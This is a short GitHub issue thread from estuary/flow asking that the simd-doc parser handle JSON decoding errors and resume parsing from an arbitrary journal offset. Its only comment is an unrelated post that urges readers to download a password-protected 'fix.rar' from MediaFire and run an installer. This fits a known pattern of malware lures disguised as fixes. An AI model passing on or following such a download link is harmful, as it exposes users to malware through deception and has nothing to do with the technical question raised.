### ISSUE TITLE
simd-doc: handle parser re-entrancy on parsing errors

### ISSUE THREAD

**Issue by jgraettinger** [estuary/flow#1584]
It should be possible to start parsing at an arbitrary journal offset, encounter a JSON decoding error (because the offset is not a document boundary), but to re-poll the Stream and continue parsing.

**Comment by KazySahab** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."
